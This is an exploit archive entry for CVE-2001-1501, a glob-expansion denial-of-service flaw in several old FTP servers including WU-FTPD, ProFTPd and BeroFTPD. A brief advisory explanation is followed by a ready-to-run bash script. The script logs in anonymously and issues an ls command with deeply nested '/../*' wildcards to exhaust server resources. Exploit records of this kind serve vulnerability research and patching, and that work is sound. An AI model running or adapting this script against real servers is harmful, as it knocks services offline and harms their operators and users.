WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion

Author: Frank DENIS
type: remote
platform: linux
port: 
date_added: 2001-03-15  
date_updated: 2012-08-20  
verified: 1  
codes: CVE-2001-1501;OSVDB-526  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20690.sh  

source: https://www.securityfocus.com/bid/2496/info

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.

Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.

The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.

#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20